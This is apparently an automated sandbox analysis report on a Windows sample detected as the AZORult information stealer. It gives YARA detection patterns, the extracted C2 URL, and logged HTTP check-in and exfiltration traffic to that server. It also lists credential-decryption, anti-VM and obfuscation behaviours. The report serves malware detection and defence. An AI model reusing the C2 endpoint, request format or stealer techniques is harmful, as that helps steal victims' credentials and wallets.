Play interactive tour

Edit tour

Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Sample Name:	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Analysis ID:	491841
MD5:	73bd76f0549cc1992d943ddfd92a9c4d
SHA1:	802e70b76c7c0860b3a4a257b1bc96fc3430ff01
SHA256:	2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
Tags:	AZORultexe
Infos:
Most interesting Screenshot:

Detection

AZORult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Azorult

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Detected AZORult Info Stealer

Yara detected Azorult Info Stealer

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Yara signature match

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

IP address seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe' MD5: 73BD76F0549CC1992D943DDFD92A9C4D)

cleanup

Malware Configuration

Threatname: Azorult

{"C2 url": "http://admin.svapofit.com/azs/index.php"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	Azorult_1	Azorult Payload	kevoreilly	0x16753:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	Azorult_1	Azorult Payload	kevoreilly	0x16753:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Avira: detected

Found malware configuration

Show sources

Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp

Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"}

Multi AV Scanner detection for submitted file

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Virustotal: Detection: 68%			Perma Link
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	ReversingLabs: Detection: 75%

Antivirus detection for URL or domain

Show sources

Source: http://ww1.survey-smiles.com/%	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/e	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/z	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/sof	Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Show sources

Source: admin.svapofit.com	Virustotal: Detection: 9%	Perma Link
Source: survey-smiles.com	Virustotal: Detection: 7%	Perma Link
Source: ww1.survey-smiles.com	Virustotal: Detection: 8%	Perma Link

Machine Learning detection for sample

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_0040A610 CryptUnprotectData,LocalFree,

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://admin.svapofit.com/azs/index.php

Source: global traffic	HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176

Source: Joe Sandbox View

ASN Name: NOCIXUS NOCIXUS

Source: Joe Sandbox View

IP Address: 199.59.242.153 199.59.242.153

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp	String found in binary or memory: http://admin.svapofit.com/azs/index.php
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.com/azs/index.php8
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: http://ip-api.com/json
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.c-k
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: http://survey-smiles.com
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.com/=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://survey-smiles.com/csvc
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/e
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/sof
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	String found in binary or memory: http://ww1.survey-smiles.com/z
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: http://www.icq.com/legal/eula/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: http://www.icq.com/legal/privacypolicy/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: https://dotbit.me/a/

Source: unknown

HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=

Source: unknown

DNS traffic detected: queries for: admin.svapofit.com

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: String function: 004034E4 appears 32 times

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Process Stats: CPU usage > 98%

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	ReversingLabs: Detection: 75%

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Static PE information: More than 200 imports for KERNEL32.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041A068 push 0041A08Eh; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041A02C push 0041A05Ch; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E8D0 push 0040E905h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B164 push 0040B190h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E908 push 0040E94Ah; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B12C push 0040B158h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C136 push 0040C164h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C138 push 0040C164h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040813C push 00408174h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004171E8 push 00417214h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C9EA push 0040CA18h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C9EC push 0040CA18h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E1A4 push 0040E1D0h; ret
